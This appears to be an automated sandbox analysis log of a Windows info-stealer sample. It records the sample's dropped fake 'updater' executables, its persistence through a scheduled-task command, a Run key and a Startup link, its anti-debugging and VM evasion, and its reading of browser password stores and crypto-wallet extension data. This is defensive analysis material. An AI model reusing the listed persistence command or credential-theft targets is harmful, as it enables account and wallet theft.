Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe

Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 4112 base: 15F0005 value: E9 8B 2F 90 75			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 4112 base: 76EF2F90 value: E9 7A D0 6F 8A			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D57890 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_06D57890

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe

RDTSC instruction interceptor: First address: EFE543 second address: EFE547 instructions: 0x00000000 rdtsc 0x00000002 not cl 0x00000004 rdtsc

Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 3658			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 493			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 5011			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Window / User API: threadDelayed 9995			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\Desktop\file.exe

API coverage: 8.9 %

Source: C:\Users\user\Desktop\file.exe TID: 3424	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1480	Thread sleep time: -693000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3424	Thread sleep time: -3661658s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1480	Thread sleep time: -1479000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3424	Thread sleep time: -5016011s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 3504	Thread sleep count: 9995 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 3504	Thread sleep time: -2248875s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D2B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError,		0_2_06D2B2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D62EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,		0_2_06D62EAD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D7CCFD FindFirstFileExW,		0_2_06D7CCFD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D2BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,		0_2_06D2BAC0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D86276 VirtualQuery,GetSystemInfo,

0_2_06D86276

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 30000

Jump to behavior

Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: formVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .utiitsl.comVMware20,1169642865
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ccount.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,116x
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CT service, encrypted_token FROM token_servicerr global passwords blocklistVMware20,11696428655
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696
Source: file.exe, 00000000.00000003.2037044301.00000000016B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .comVMware20,11696428
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,1169642865
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r global passwords blocklistVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.3698690548.00000000064C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.3698791395.0000000001714000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_D59C8AA1Ee
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nickname.utiitsl.comVMware20,1169642865
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.3698791395.0000000001714000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_D59C8AA1
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ra Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696P
Source: file.exe	Binary or memory string: :sqEMu
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o.inVMware20,11696428655~
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2037044301.00000000016B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000002.4445088347.0000000006456000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}gramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsE
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: comVMware20,11696428655o
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rootpagecomVMware20,11696428655o
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000002.4445088347.0000000006430000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pageformVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}AW.EXE;MMC.EXE;MSHTA.EXE;RUNDLL32.EXE;WINHLP32.EXE;4DX-
Source: file.exe, 00000000.00000002.4443887762.000000000169D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: GNGpmTFam5reWeb Data.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000002.4443887762.0000000001699000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: billing_address_id.comVMware20,11696428

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D61780 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

0_2_06D61780

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D4C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle,

0_2_06D4C990

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D576E0 GetProcessHeap,HeapFree,

0_2_06D576E0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D662B6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_06D662B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D66014 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_06D66014
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D6FC07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_06D6FC07

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe"

Jump to behavior

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D65D6C cpuid

0_2_06D65D6C

Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,		0_2_06D802FD
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,		0_2_06D80227
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,		0_2_06D75047
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,		0_2_06D80121
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,		0_2_06D7FFF8
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoEx,FormatMessageA,		0_2_06D62CC6
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,		0_2_06D7FC7F
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,		0_2_06D7FC34
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,		0_2_06D7FDA5
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,		0_2_06D7FD1A
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,		0_2_06D74ADB
Source: C:\Users\user\Desktop\file.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,		0_2_06D7F988

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D6537F GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,

0_2_06D6537F

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D4C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle,

0_2_06D4C990

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: Yara match	File source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE

Source: Yara match	File source: 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2157362439.00000000061CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zip, type: DROPPED

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini			Jump to behavior
